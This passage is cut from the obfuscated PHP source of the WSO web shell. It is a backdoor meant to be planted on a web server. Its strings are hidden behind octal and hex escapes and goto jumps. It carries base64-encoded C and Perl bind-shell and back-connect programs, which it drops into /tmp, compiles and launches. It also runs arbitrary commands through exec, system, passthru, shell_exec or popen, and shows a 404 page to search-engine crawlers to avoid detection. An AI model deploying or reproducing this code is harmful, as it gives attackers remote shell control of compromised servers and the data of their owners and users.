54\x73\x4e\103\151\101\x67\111\x43\102\153\144\130\101\171\x4b\107\132\x6b\x4c\x43\x41\171\x4b\x54\163\x4e\103\x69\x41\147\x49\103\x42\x7a\145\130\x4e\x30\132\x57\60\157\111\151\x39\x69\x61\127\x34\166\143\x32\147\147\114\x57\x6b\x69\x4b\124\x73\x4e\103\151\x41\147\x49\103\x42\152\142\107\71\172\132\x53\150\155\x5a\103\x6b\67\x44\x51\160\71"; $back_connect_p = "\111\x79\x45\166\144\130\x4e\171\114\x32\112\160\x62\x69\x39\x77\x5a\130\x4a\x73\x44\x51\160\x31\143\x32\x55\x67\x55\x32\71\152\x61\x32\126\60\x4f\x77\x30\113\x4a\x47\154\x68\132\107\x52\x79\x50\x57\x6c\165\x5a\x58\x52\x66\131\x58\x52\166\142\x69\x67\x6b\121\126\112\x48\x56\x6c\163\167\x58\123\x6b\x67\146\x48\167\147\x5a\x47\x6c\x6c\x4b\x43\112\x46\143\x6e\x4a\166\x63\x6a\x6f\147\112\103\x46\x63\142\x69\x49\x70\x4f\167\x30\x4b\x4a\110\102\150\132\x47\x52\171\x50\x58\x4e\x76\131\x32\x74\x68\x5a\x47\122\x79\130\62\x6c\x75\113\x43\x52\102\125\153\144\127\x57\172\x46\144\114\103\101\x6b\141\x57\x46\153\132\x48\111\160\111\110\x78\x38\111\107\122\160\x5a\x53\147\x69\122\x58\x4a\x79\142\63\111\x36\111\x43\x51\x68\130\x47\64\x69\x4b\124\x73\x4e\103\x69\122\167\x63\x6d\71\x30\142\172\x31\x6e\132\x58\122\167\x63\x6d\71\60\142\x32\112\x35\x62\155\x46\164\x5a\x53\x67\156\144\x47\x4e\x77\112\171\x6b\x37\x44\121\x70\172\142\x32\116\162\132\x58\121\157\x55\x30\71\x44\x53\60\x56\125\x4c\x43\x42\x51\x52\154\x39\x4a\x54\x6b\126\125\x4c\103\102\124\x54\x30\x4e\x4c\x58\61\116\x55\125\x6b\x56\102\x54\x53\167\x67\x4a\110\102\x79\142\63\122\166\113\123\x42\x38\146\x43\x42\x6b\141\x57\125\x6f\111\x6b\126\x79\143\x6d\x39\x79\x4f\x69\101\x6b\111\x56\170\x75\111\151\x6b\67\104\121\160\x6a\x62\x32\x35\x75\x5a\127\x4e\x30\x4b\106\116\x50\x51\x30\x74\x46\126\x43\x77\x67\112\110\102\150\132\x47\x52\x79\113\123\102\70\x66\x43\102\x6b\141\x57\125\157\111\153\126\171\x63\155\x39\171\x4f\151\x41\x6b\x49\x56\x78\165\x49\151\x6b\67\104\121\160\x76\143\107\126\x75\113\106\x4e\x55\122\105\x6c\117\114\x43\101\x69\x50\151\x5a\124\124\60\x4e\114\122\126\x51\x69\113\x54\x73\116\x43\155\x39\167\132\x57\x34\157\x55\x31\x52\x45\x54\61\126\x55\114\103\101\151\120\151\132\x54\124\x30\x4e\114\x52\x56\x51\151\x4b\x54\163\x4e\x43\155\71\x77\x5a\x57\x34\x6f\x55\x31\122\105\122\126\112\x53\114\x43\101\151\x50\x69\132\x54\124\60\x4e\114\122\126\121\151\x4b\x54\163\x4e\x43\x6e\x4e\65\143\63\122\154\x62\123\x67\156\x4c\x32\112\160\x62\x69\x39\x7a\x61\x43\x41\164\141\123\x63\160\x4f\x77\x30\113\131\x32\170\x76\143\x32\125\x6f\125\x31\x52\x45\123\125\x34\x70\117\167\60\113\x59\x32\170\x76\143\62\125\157\x55\x31\122\105\124\61\126\x55\113\124\163\x4e\103\x6d\x4e\x73\142\x33\x4e\154\x4b\106\x4e\125\122\x45\126\123\125\x69\x6b\67"; $bind_port_c = "\111\x32\x6c\x75\x59\62\170\x31\x5a\x47\x55\147\x50\110\116\x30\x5a\x47\154\166\x4c\x6d\x67\x2b\x44\121\x6f\x6a\141\x57\x35\152\x62\110\126\153\132\123\101\70\x63\x33\x52\171\x61\x57\65\x6e\114\155\x67\x2b\x44\x51\x6f\x6a\x61\127\65\152\142\x48\x56\x6b\132\123\x41\70\144\127\x35\160\x63\x33\122\x6b\x4c\x6d\x67\x2b\x44\121\x6f\x6a\x61\x57\x35\x6a\x62\110\x56\x6b\132\123\101\70\x62\155\x56\60\132\107\111\x75\x61\x44\x34\x4e\x43\x69\116\x70\x62\155\x4e\163\144\x57\x52\x6c\111\104\x78\x7a\x64\107\122\163\x61\127\x49\x75\141\x44\x34\x4e\103\x6d\154\x75\x64\103\102\x74\x59\127\154\165\x4b\107\154\165\x64\x43\x42\x68\143\155\144\x6a\x4c\x43\102\x6a\141\x47\106\171\x49\x43\x6f\x71\x59\x58\x4a\x6e\x64\x69\153\x67\x65\x77\60\x4b\x49\103\101\147\x49\107\x6c\x75\144\103\102\172\x4c\107\115\163\x61\x54\x73\x4e\103\x69\101\x67\111\103\x42\x6a\x61\x47\106\x79\111\110\x42\142\x4d\172\102\x64\x4f\167\x30\x4b\111\103\101\x67\111\110\x4e\60\x63\156\126\x6a\x64\x43\102\172\x62\62\x4e\162\x59\127\x52\153\x63\x6c\71\x70\x62\x69\x42\171\x4f\167\x30\113\x49\x43\101\x67\x49\107\122\150\132\127\x31\166\x62\151\x67\170\x4c\104\101\x70\117\167\x30\113\x49\x43\101\x67\111\110\115\147\x50\x53\102\x7a\x62\62\x4e\162\x5a\130\121\x6f\121\x55\x5a\x66\123\125\x35\x46\126\x43\x78\124\x54\60\116\114\x58\61\x4e\125\x55\x6b\126\102\124\123\x77\167\x4b\124\163\116\103\151\101\147\111\x43\x42\x70\x5a\151\147\150\143\171\x6b\x67\x63\x6d\126\60\x64\130\x4a\x75\111\x43\60\x78\117\167\x30\x4b\111\103\101\x67\111\x48\x49\165\x63\x32\x6c\165\x58\x32\132\x68\x62\x57\154\163\x65\123\x41\71\111\x45\x46\107\130\60\154\117\122\x56\121\x37\x44\121\x6f\x67\x49\103\101\147\143\x69\65\172\141\x57\65\x66\x63\x47\x39\x79\x64\x43\x41\71\x49\107\150\x30\142\x32\x35\x7a\113\107\x46\60\x62\x32\153\157\131\x58\112\156\x64\x6c\163\x78\x58\123\x6b\x70\117\167\x30\113\111\x43\x41\147\111\110\x49\x75\143\x32\154\165\x58\x32\106\153\132\110\x49\x75\x63\x31\71\x68\x5a\107\x52\171\111\x44\x30\x67\141\110\122\166\142\155\x77\x6f\x53\125\65\102\122\x45\x52\x53\x58\x30\x46\117\127\x53\153\67\x44\121\x6f\147\x49\103\101\147\131\x6d\154\165\x5a\x43\x68\172\x4c\x43\x41\157\x63\x33\122\x79\x64\127\x4e\x30\x49\x48\x4e\x76\131\62\x74\150\x5a\x47\x52\x79\x49\103\x6f\160\112\x6e\x49\163\x49\104\x42\x34\x4d\124\x41\x70\x4f\167\60\113\111\x43\x41\147\x49\x47\x78\x70\x63\63\122\154\x62\151\x68\172\x4c\x43\x41\61\x4b\x54\163\116\103\x69\x41\147\111\x43\x42\63\141\x47\x6c\163\x5a\x53\147\170\x4b\x53\102\67\104\x51\x6f\x67\111\x43\x41\147\111\x43\x41\x67\111\x47\x4d\71\131\x57\116\152\132\130\102\x30\113\x48\x4d\x73\115\x43\167\167\x4b\124\x73\x4e\103\x69\101\x67\x49\103\x41\x67\x49\x43\x41\x67\132\110\x56\167\115\x69\x68\152\x4c\104\x41\x70\117\x77\60\x4b\111\x43\x41\147\111\103\101\x67\x49\x43\102\x6b\x64\x58\x41\x79\113\107\115\x73\115\123\153\67\x44\x51\x6f\x67\111\x43\x41\x67\x49\x43\x41\147\111\x47\122\x31\143\104\x49\157\x59\171\167\x79\113\124\x73\x4e\x43\151\x41\x67\x49\x43\x41\147\111\103\x41\147\144\63\112\x70\x64\107\x55\157\131\x79\x77\x69\125\x47\x46\172\x63\63\144\166\143\x6d\121\x36\x49\x69\x77\65\113\124\163\x4e\103\151\x41\x67\x49\103\101\x67\x49\x43\x41\x67\143\x6d\x56\150\132\x43\150\152\114\110\x41\x73\x63\62\x6c\x36\132\127\x39\x6d\x4b\x48\x41\160\113\x54\163\x4e\103\151\x41\147\111\103\101\147\x49\x43\101\x67\x5a\x6d\71\x79\x4b\107\153\71\115\x44\x74\160\120\x48\116\x30\143\x6d\x78\x6c\142\151\x68\x77\x4b\124\164\x70\x4b\x79\x73\160\104\x51\x6f\x67\x49\103\101\147\111\103\x41\147\111\103\101\147\x49\x43\x42\160\132\x69\147\147\x4b\x48\102\142\141\x56\60\x67\120\124\x30\x67\112\61\x78\x75\112\171\x6b\147\146\x48\167\x67\113\x48\102\142\141\126\60\x67\120\x54\x30\x67\112\x31\x78\171\112\x79\x6b\x67\x4b\x51\60\x4b\x49\x43\101\x67\x49\x43\101\x67\111\x43\x41\147\111\x43\101\x67\111\x43\101\x67\x49\110\102\142\x61\x56\x30\147\120\123\x41\x6e\130\x44\101\156\x4f\x77\x30\x4b\111\x43\x41\x67\111\103\x41\x67\111\x43\x42\x70\x5a\151\x41\x6f\x63\63\x52\x79\131\62\x31\167\x4b\x47\x46\171\x5a\63\132\142\x4d\154\60\x73\x63\x43\x6b\147\x50\124\60\147\x4d\x43\x6b\116\103\151\101\x67\x49\x43\101\x67\111\x43\x41\147\x49\103\x41\x67\111\x48\116\x35\x63\x33\x52\154\x62\123\147\151\114\x32\112\160\142\x69\71\x7a\x61\x43\x41\164\x61\x53\111\x70\117\167\x30\113\111\103\x41\147\111\x43\x41\x67\111\103\102\x6a\x62\107\71\172\132\x53\x68\152\x4b\124\163\116\103\x69\101\147\x49\x43\x42\71\x44\121\x70\71"; $bind_port_p = "\x49\171\x45\x76\x64\130\116\x79\x4c\62\x4a\160\x62\x69\71\x77\x5a\x58\112\x73\104\x51\x6f\153\125\x30\150\x46\124\105\x77\x39\x49\x69\x39\x69\x61\x57\x34\166\x63\62\x67\x67\114\x57\153\x69\117\x77\x30\x4b\141\x57\x59\147\113\105\x42\102\x55\x6b\144\127\111\x44\167\x67\115\x53\x6b\x67\x65\171\102\x6c\x65\107\x6c\x30\113\104\x45\x70\x4f\171\102\71\104\x51\160\x31\143\x32\125\x67\x55\x32\71\x6a\x61\62\126\60\x4f\167\x30\113\x63\x32\71\152\x61\62\x56\60\113\x46\115\163\112\x6c\x42\107\x58\x30\x6c\117\122\x56\121\x73\x4a\x6c\116\x50\x51\60\164\x66\125\61\122\123\122\125\x46\x4e\114\107\x64\x6c\144\x48\102\171\142\x33\122\x76\131\156\154\165\131\x57\61\x6c\113\103\x64\60\131\63\101\156\x4b\123\x6b\x67\146\110\167\x67\x5a\x47\x6c\154\x49\103\112\x44\x59\127\65\x30\111\x47\x4e\171\x5a\127\x46\x30\x5a\x53\102\172\142\x32\116\x72\x5a\x58\x52\143\142\151\111\x37\104\121\x70\x7a\x5a\x58\x52\172\142\62\116\x72\142\x33\102\x30\x4b\x46\x4d\163\125\60\71\115\x58\x31\x4e\x50\121\x30\164\x46\x56\x43\170\124\124\x31\71\x53\x52\x56\126\124\x52\x55\106\105\x52\x46\111\x73\x4d\x53\153\x37\x44\x51\160\x69\x61\x57\65\153\x4b\106\115\163\x63\62\71\x6a\141\62\x46\153\132\110\x4a\x66\x61\x57\x34\157\x4a\x45\x46\123\x52\61\132\142\x4d\x46\60\163\x53\x55\65\102\122\105\x52\x53\130\60\106\117\127\x53\153\160\x49\110\170\70\111\x47\x52\x70\132\123\101\x69\121\62\x46\x75\144\103\x42\166\143\x47\126\165\111\110\x42\x76\143\156\122\x63\142\x69\111\67\x44\x51\160\x73\141\130\116\x30\x5a\127\64\157\x55\x79\167\172\113\x53\x42\70\x66\103\x42\x6b\x61\x57\125\x67\x49\x6b\116\150\x62\156\x51\147\x62\x47\154\172\x64\x47\x56\165\111\x48\102\166\x63\x6e\122\x63\142\x69\x49\x37\x44\x51\x70\63\x61\107\x6c\x73\x5a\x53\x67\170\x4b\123\102\67\x44\121\x6f\112\131\x57\x4e\x6a\132\x58\102\60\x4b\x45\116\x50\124\153\64\163\x55\x79\x6b\x37\104\121\x6f\112\141\127\x59\x6f\111\123\147\x6b\143\x47\154\153\120\x57\132\x76\143\x6d\x73\160\x4b\x53\102\67\104\x51\x6f\x4a\103\x57\122\x70\132\x53\x41\151\x51\62\x46\165\142\155\71\x30\x49\x47\x5a\x76\143\155\163\151\111\x47\154\x6d\x49\103\147\150\x5a\107\x56\155\x61\x57\65\154\132\103\x41\x6b\x63\107\x6c\153\113\124\163\x4e\x43\147\x6b\x4a\142\63\x42\x6c\x62\x69\102\124\x56\105\x52\112\124\x69\x77\151\x50\x43\x5a\104\124\x30\x35\117\x49\x6a\x73\x4e\x43\x67\x6b\x4a\x62\x33\102\154\142\x69\102\x54\126\x45\122\120\x56\126\x51\163\x49\x6a\x34\155\x51\60\x39\117\x54\151\x49\x37\104\121\157\112\x43\x57\x39\167\132\127\x34\147\125\x31\x52\105\x52\126\112\123\x4c\103\111\x2b\x4a\x6b\116\120\124\x6b\x34\151\x4f\x77\60\x4b\103\x51\154\x6c\145\x47\x56\152\x49\x43\122\124\x53\105\126\115\124\x43\x42\70\146\x43\x42\x6b\141\x57\125\147\143\x48\x4a\160\142\156\x51\147\x51\60\71\x4f\x54\x69\x41\x69\121\62\x46\165\x64\x43\x42\x6c\145\x47\x56\152\144\x58\x52\x6c\111\103\x52\124\x53\x45\126\x4d\124\106\x78\x75\111\152\163\116\103\147\153\x4a\131\62\x78\x76\x63\x32\x55\147\121\x30\x39\117\x54\152\163\x4e\x43\x67\x6b\x4a\x5a\x58\x68\160\x64\x43\x41\x77\x4f\x77\x30\x4b\103\130\60\116\x43\156\x30\x3d"; echo "\74\x68\x31\x3e\x4e\145\x74\x77\157\x72\x6b\x20\164\x6f\x6f\154\163\74\x2f\150\61\76\x3c\x64\151\166\40\x63\x6c\x61\163\x73\x3d\143\157\156\164\145\x6e\x74\76\12\11\74\146\x6f\x72\155\x20\x6e\141\x6d\x65\75\x27\x6e\x66\160\x27\40\x6f\x6e\123\165\x62\155\151\164\75\x27\x67\50\156\x75\154\154\x2c\x6e\165\x6c\154\x2c\x74\x68\x69\163\56\165\x73\151\x6e\147\x2e\166\x61\x6c\165\x65\54\164\x68\x69\x73\x2e\160\x6f\162\x74\56\x76\x61\154\165\145\x2c\164\150\151\163\x2e\160\141\163\x73\x2e\166\141\154\x75\x65\51\73\162\145\x74\165\162\x6e\40\146\141\154\x73\x65\x3b\47\76\12\11\x3c\163\160\x61\x6e\x3e\102\x69\x6e\x64\40\x70\157\162\x74\x20\x74\x6f\40\x2f\142\x69\x6e\x2f\163\x68\x3c\57\163\160\141\156\76\74\142\162\57\76\xa\11\120\157\x72\164\72\40\74\x69\156\160\x75\x74\x20\164\x79\x70\x65\x3d\x27\164\x65\170\x74\47\40\x6e\141\155\x65\75\47\x70\x6f\162\x74\47\x20\166\x61\x6c\165\x65\x3d\47\x33\x31\63\63\x37\x27\x3e\x20\120\141\x73\163\x77\157\162\144\x3a\x20\74\151\156\160\x75\x74\40\x74\171\x70\145\75\47\x74\145\170\164\x27\40\x6e\x61\x6d\x65\x3d\47\160\x61\163\x73\47\76\40\125\163\x69\156\x67\x3a\x20\x3c\154\x61\x62\145\x6c\76\x3c\x73\145\x6c\145\x63\x74\x20\156\141\x6d\145\75\x27\x75\x73\x69\x6e\x67\47\x3e\x3c\x6f\160\164\151\157\x6e\x20\x76\141\154\x75\145\75\x27\142\x70\143\x27\76\x43\74\57\x6f\x70\164\151\x6f\156\x3e\x3c\157\x70\164\151\x6f\x6e\40\166\141\x6c\x75\x65\75\x27\x62\x70\160\x27\x3e\120\x65\x72\x6c\74\x2f\157\160\164\151\x6f\x6e\x3e\74\x2f\x73\145\154\x65\143\x74\x3e\x3c\x2f\x6c\141\142\145\154\76\x20\x3c\151\x6e\x70\165\x74\40\164\x79\160\x65\x3d\163\165\142\155\x69\164\x20\x76\x61\154\165\x65\x3d\x27\163\x75\142\x6d\x69\164\47\x3e\12\11\74\57\146\157\x72\155\x3e\12\x9\74\x66\x6f\162\x6d\40\156\141\155\145\75\x27\156\146\x70\47\40\x6f\x6e\123\165\x62\x6d\151\164\75\47\147\50\x6e\x75\x6c\154\x2c\x6e\165\x6c\x6c\54\x74\x68\151\163\x2e\x75\163\x69\156\x67\x2e\166\x61\154\165\x65\x2c\164\150\151\x73\x2e\x73\x65\162\166\x65\x72\56\x76\141\x6c\x75\x65\54\x74\150\x69\163\56\160\157\x72\164\x2e\x76\141\x6c\165\x65\x29\x3b\162\x65\164\165\x72\156\40\x66\x61\x6c\x73\x65\73\x27\76\xa\x9\74\163\x70\x61\156\76\x42\141\143\153\55\143\157\156\156\145\143\164\40\164\x6f\74\57\x73\x70\x61\x6e\76\x3c\142\162\57\x3e\xa\x9\x53\145\162\x76\x65\162\x3a\x20\74\x69\x6e\160\x75\164\40\x74\x79\x70\145\75\47\x74\x65\x78\x74\47\40\156\x61\x6d\x65\75\47\x73\x65\x72\166\x65\162\x27\40\x76\x61\x6c\x75\x65\75" . $_SERVER["\122\x45\x4d\117\124\105\x5f\101\x44\104\x52"] . "\76\x20\x50\157\x72\164\x3a\x20\74\x69\156\160\x75\x74\x20\x74\x79\160\145\75\x27\x74\145\170\x74\47\x20\156\x61\155\x65\75\x27\x70\x6f\162\164\x27\40\166\x61\154\x75\x65\75\x27\x33\61\63\x33\x37\47\76\40\125\163\x69\156\147\72\40\x3c\154\141\142\x65\154\76\74\163\145\x6c\145\143\164\x20\x6e\141\x6d\145\75\47\165\x73\x69\156\147\x27\x3e\x3c\x6f\160\164\151\157\156\40\x76\141\x6c\x75\x65\75\x27\142\x63\x63\47\76\103\x3c\57\x6f\160\164\x69\x6f\x6e\76\74\157\x70\x74\151\x6f\x6e\40\x76\141\x6c\165\145\x3d\47\x62\x63\160\x27\x3e\120\x65\162\x6c\x3c\57\x6f\160\x74\x69\157\x6e\76\74\57\x73\145\x6c\x65\x63\x74\x3e\x3c\57\154\141\142\145\154\x3e\x20\x3c\x69\x6e\160\x75\x74\x20\x74\x79\160\145\x3d\163\x75\142\x6d\x69\x74\x20\166\x61\154\165\x65\75\47\163\x75\x62\x6d\151\x74\47\76\12\11\x3c\57\146\157\x72\x6d\76\74\142\x72\76"; if (isset($_POST["\160\x31"])) { function cf($f, $t) { $w = @fopen($f, "\167") or @function_exists("\x66\x69\154\x65\137\160\x75\164\137\143\157\156\164\145\156\164\x73"); if ($w) { @fwrite($w, base64_decode($t)) or @fputs($w, base64_decode($t)) or @file_put_contents($f, base64_decode($t)); @fclose($w); } } if ($_POST["\x70\x31"] == "\x62\160\143") { cf("\57\164\155\160\57\x62\160\56\x63", $bind_port_c); $ = ex("\x67\143\x63\x20\55\x6f\x20\x2f\164\155\x70\x2f\142\160\x20\57\164\x6d\160\57\x62\x70\56\143"); @unlink("\57\x74\155\x70\57\x62\x70\x2e\143"); $ .= ex("\x2f\x74\155\x70\57\x62\160\40" . $_POST["\x70\62"] . "\40" . $_POST["\160\63"] . "\x20\46"); echo "\x3c\x70\162\x65\40\x63\154\x61\163\163\75\155\x6c\x31\76{$}" . ex("\x70\163\x20\141\x75\170\40\174\x20\147\162\x65\x70\x20\x62\160") . "\x3c\57\x70\x72\145\76"; } if ($_POST["\160\61"] == "\142\160\x70") { cf("\x2f\164\155\x70\57\142\160\x2e\160\x6c", $bind_port_p); $ = ex(which("\160\x65\x72\x6c") . "\x20\57\x74\155\160\x2f\x62\160\x2e\160\x6c\40" . $_POST["\160\x32"] . "\x20\46"); echo "\x3c\x70\162\x65\x20\143\x6c\x61\163\163\75\155\154\x31\x3e{$}" . ex("\160\x73\x20\141\x75\170\x20\174\40\147\162\x65\160\x20\142\x70\56\160\x6c") . "\x3c\x2f\160\162\145\x3e"; } if ($_POST["\x70\61"] == "\142\143\x63") { cf("\57\164\155\x70\x2f\142\143\x2e\143", $back_connect_c); $ = ex("\x67\x63\x63\40\55\157\40\57\164\x6d\160\57\x62\143\40\x2f\164\155\160\57\x62\x63\x2e\x63"); @unlink("\57\x74\155\x70\57\142\143\56\143"); $ .= ex("\57\x74\x6d\160\x2f\142\143\x20" . $_POST["\160\x32"] . "\x20" . $_POST["\x70\x33"] . "\40\46"); echo "\74\160\162\x65\40\x63\x6c\141\x73\163\75\x6d\x6c\61\76{$}" . ex("\x70\163\40\x61\x75\170\x20\174\40\x67\x72\145\160\x20\x62\143") . "\74\57\x70\x72\145\76"; } if ($_POST["\x70\61"] == "\142\143\x70") { cf("\x2f\164\x6d\160\x2f\142\x63\56\x70\154", $back_connect_p); $ = ex(which("\160\x65\x72\154") . "\x20\x2f\164\155\x70\x2f\142\143\56\160\154\x20" . $_POST["\160\x32"] . "\x20" . $_POST["\x70\x33"] . "\x20\46"); echo "\74\160\162\145\x20\143\154\141\x73\163\75\155\154\x31\76{$}" . ex("\x70\x73\x20\x61\165\170\40\174\40\x67\162\x65\160\40\142\x63\x2e\x70\x6c") . "\x3c\57\x70\x72\145\76"; } } echo "\74\x2f\144\151\x76\76"; hardFooter(); } goto M5O7z; YnRbs: function hardScandir($dir) { if (function_exists("\163\143\141\156\x64\x69\x72")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } goto VnLxZ; VMrgb: function ex($in) { $ = ''; if (function_exists("\145\x78\145\x63")) { @exec($in, $); $ = @join("\xa", $); } elseif (function_exists("\160\141\163\x73\x74\150\x72\x75")) { ob_start(); @passthru($in); $ = ob_get_clean(); } elseif (function_exists("\163\171\x73\x74\145\155")) { ob_start(); @system($in); $ = ob_get_clean(); } elseif (function_exists("\x73\150\145\154\x6c\137\145\170\145\x63")) { $ = shell_exec($in); } elseif (is_resource($f = @popen($in, "\x72"))) { $ = ''; while (!@feof($f)) { $ .= fread($f, 1024); } pclose($f); } else { return "\xe2\x86\263\40\125\x6e\141\142\154\x65\40\164\x6f\40\145\170\145\143\165\164\145\40\143\x6f\x6d\x6d\141\x6e\x64\12"; } return $ == '' ? "\xe2\x86\263\40\x51\165\145\162\171\x20\x64\x69\x64\x20\156\x6f\x74\x20\x72\x65\x74\x75\x72\156\40\141\x6e\x79\x74\x68\151\x6e\147\xa" : $; } goto nbi9R; VnLxZ: function which($p) { $path = ex("\167\150\151\143\x68\x20" . $p); if (!empty($path)) { return $path; } return false; } goto Th0Rk; PtFVC: function hardLogin() { if (!empty($_SERVER["\x48\x54\x54\120\137\125\x53\x45\122\137\x41\x47\x45\x4e\x54"])) { $userAgents = array("\x47\157\157\147\x6c\x65", "\x53\x6c\x75\162\x70", "\x4d\123\x4e\102\x6f\x74", "\x69\x61\x5f\x61\x72\x63\x68\x69\x76\x65\162", "\131\141\156\144\x65\170", "\122\x61\x6d\x62\x6c\x65\x72"); if (preg_match("\57" . implode("\x7c", $userAgents) . "\57\x69", $_SERVER["\110\x54\x54\120\x5f\x55\x53\105\x52\137\x41\107\105\116\x54"])) { header("\110\x54\124\120\x2f\x31\x2e\60\x20\64\60\64\x20\116\157\x74\x20\x46\157\x75\156\x64"); die; } } die("\x3c\x2f\142\162\76\x3c\57\x62\x72\x3e\74\160\162\x65\x20\x61\154\151\x67\156\75\x63\x65\x6e\164\x65\x72\x3e\74\146\x6f\x72\155\x20\x6d\x65\x74\150\x6f\144\75\160\157\163\164\x20\163\164\171\x6c\145\x3d\47\x66\x6f\156\164\x2d\146\141\155\151\x6c\x79\x3a\x4e\165\x6e\151\x74\x6f\54\x20\x73\141\156\163\x2d\163\145\162\x69\x66\x3b\x63\157\x6c\x6f\x72\72\x23\61\x61\61\141\61\x61\73\40\164\x65\x78\x74\x2d\163\150\141\144\x6f\167\72\x20\x32\160\x78\x20\60\40\60\40\x23\60\x64\65\62\x62\146\54\x20\55\x32\160\170\40\x30\40\60\x20\x23\x30\144\65\x32\142\x66\x2c\x20\x30\x20\62\x70\170\x20\60\40\43\60\144\x35\x32\142\x66\x2c\x20\60\40\55\62\x70\170\40\60\40\x23\60\x64\65\62\142\146\54\x20\x31\160\170\x20\x31\x70\170\40\43\x30\x64\x35\62\142\146\x2c\x20\55\x31\160\x78\x20\55\61\160\170\x20\60\40\x23\60\144\65\x32\x62\x66\x2c\40\61\160\x78\x20\55\61\x70\170\40\x30\x20\x23\60\144\65\x32\x62\x66\x2c\x20\x2d\x31\160\x78\40\61\x70\170\x20\60\40\43\x30\144\65\62\x62\x66\x3b\40\164\x65\170\x74\55\141\x6c\151\147\x6e\x3a\40\x63\x65\x6e\164\145\x72\x3b\47\76\74\150\63\76\110\x65\x6c\x6c\x6f\40\x3c\x62\162\x3e\x57\145\x6c\143\157\x6d\x65\x20\x74\157\x20\x77\x73\x6f\x20\167\145\142\163\150\145\154\154\40\162\145\144\x65\x73\151\147\x6e\141\x74\145\x64\x20\x62\x79\x20\155\x49\143\110\x79\40\x41\155\x52\141\116\145\74\57\x68\63\x3e\x3c\142\162\x3e\74\x69\156\160\165\164\40\x70\154\141\143\145\150\x6f\x6c\144\145\x72\x3d\47\160\x61\x73\x73\167\x6f\x72\x64\x27\x20\x74\171\x70\145\x3d\160\x61\163\x73\167\157\162\144\x20\156\x61\155\x65\x3d\160\x61\163\163\x20\163\x74\x79\x6c\x65\75\x27\142\157\x72\x64\145\x72\55\x72\141\x64\x69\x75\x73\x3a\40\64\x70\x78\x20\60\x70\170\x20\x30\160\x78\x20\64\x70\x78\73\40\142\141\x63\x6b\147\x72\157\165\x6e\x64\x2d\143\157\154\x6f\162\72\167\150\x69\x74\145\x73\x6d\x6f\153\x65\x3b\142\x6f\x72\144\x65\162\72\61\x70\x78\40\x73\x6f\154\x69\144\x20\x23\x46\x46\x46\x3b\157\165\164\154\x69\x6e\x65\72\156\157\156\145\73\x27\x20\x72\145\x71\x75\151\162\x65\144\76\74\151\156\x70\165\164\40\x74\x79\160\145\x3d\163\x75\x62\155\x69\164\x20\156\x61\x6d\145\x3d\x27\167\141\x74\x63\150\x69\x6e\x67\x27\x20\x76\141\x6c\165\145\75\x27\76\76\x27\x20\x73\164\x79\x6c\x65\75\x27\x68\145\151\147\150\x74\72\40\62\x30\x70\170\73\x20\142\157\162\144\145\162\x3a\40\x6e\x6f\x6e\x65\73\40\142\157\162\144\145\x72\55\x72\141\x64\151\x75\x73\72\x20\60\x70\x78\40\64\x70\x78\x20\x34\x70\170\40\x30\x70\170\73\142\x61\x63\153\x67\162\x6f\165\x6e\144\x2d\143\x6f\x6c\157\x72\x3a\43\60\144\65\x32\x62\146\x3b\x63\157\154\x6f\x72\x3a\x23\x66\x66\146\73\x63\165\x72\x73\x6f\162\x3a\x70\x6f\151\x6e\x74\145\x72\x3b\47\x3e\x3c\x2f\x66\x6f\162\155\x3e\x3c\57\x70\162\x65\76\12\x3c\x64\151\x76\x20\143\154\141\x73\163\75\x27\166\151\145\x77\47\x3e\74\144\x69\x76\40\x63\154\x61\x73\163\x3d\x27\160\x6c\141\x6e\x65\x20\x6d\141\151\156\x27\76\x3c\x64\151\166\40\143\154\x61\163\x73\x3d\47\143\x69\162\x63\x6c\x65\x27\x3e\x3c\57\x64\x69\x76\x3e\x3c\x64\151\166\40\x63\x6c\141\x73\163\75\47\143\x69\x72\143\154\145\47\x3e\74\57\x64\151\x76\76\74\x64\151\x76\40\x63\x6c\141\x73\x73\75\47\143\151\x72\x63\154\x65\47\x3e\x3c\x2f\x64\x69\166\76\x3c\144\x69\166\x20\x63\x6c\x61\163\x73\75\47\x63\x69\x72\x63\154\x65\x27\x3e\74\57\x64\151\x76\76\74\x64\x69\x76\40\x63\x6c\x61\x73\163\x3d\47\143\151\162\143\154\x65\47\76\74\57\x64\151\166\x3e\74\144\x69\166\40\143\154\x61\x73\163\x3d\x27\143\151\x72\x63\154\x65\47\x3e\x3c\x2f\x64\x69\x76\76\x3c\57\144\151\166\76\74\x2f\144\151\166\76\xa\x3c\163\x74\x79\154\145\x3e\x62\x6f\144\x79\x2c\x68\164\155\154\x7b\142\141\x63\x6b\147\x72\157\165\x6e\x64\72\43\x31\141\x31\141\x31\141\73\x6f\x76\x65\162\x66\154\157\x77\72\150\151\144\x64\145\x6e\x3b\x77\x69\144\164\150\x3a\61\60\x30\45\73\150\145\x69\x67\150\x74\x3a\x31\60\60\45\73\160\157\x73\151\164\151\x6f\x6e\72\x61\x62\x73\x6f\154\165\x74\145\x3b\172\55\x69\156\144\x65\x78\72\x20\x2d\x32\73\175\56\x76\151\145\167\x7b\x70\157\x73\151\x74\151\157\x6e\72\x61\142\x73\157\x6c\x75\x74\145\73\164\157\x70\x3a\x30\x3b\154\145\x66\x74\72\60\73\162\x69\x67\x68\x74\72\60\73\142\157\164\x74\x6f\x6d\72\60\73\55\x77\145\x62\153\151\164\x2d\x70\x65\x72\x73\x70\145\143\164\151\x76\145\x3a\64\x30\60\x3b\160\145\162\x73\x70\145\x63\x74\151\x76\145\72\x34\x30\60\x3b\172\55\x69\156\144\x65\x78\x3a\x20\55\x32\73\175\56\x70\154\141\x6e\145\173\167\151\144\x74\x68\x3a\x31\x32\x30\x70\x78\73\150\x65\x69\x67\150\164\x3a\x31\x32\60\x70\170\73\55\x77\145\142\153\x69\x74\x2d\x74\x72\x61\x6e\163\x66\157\x72\x6d\x2d\163\164\171\x6c\145\x3a\x70\162\145\163\x65\162\x76\145\x2d\63\144\x3b\x74\x72\x61\x6e\x73\x66\x6f\162\155\x2d\x73\164\x79\154\x65\72\x70\x72\145\163\145\x72\166\145\55\63\144\x3b\x70\x6f\x73\x69\x74\151\157\156\72\x61\x62\163\157\154\165\164\x65\73\x7a\x2d\x69\x6e\144\x65\x78\72\40\55\x32\73\175\x2e\x70\154\141\x6e\x65\56\155\141\151\156\x7b\160\157\x73\x69\164\x69\157\x6e\72\x61\142\x73\157\154\165\164\145\73\164\x6f\160\72\x30\x3b\x6c\145\x66\x74\72\60\x3b\162\x69\x67\150\164\x3a\x30\73\x62\x6f\x74\x74\x6f\155\x3a\60\73\x6d\141\162\147\x69\x6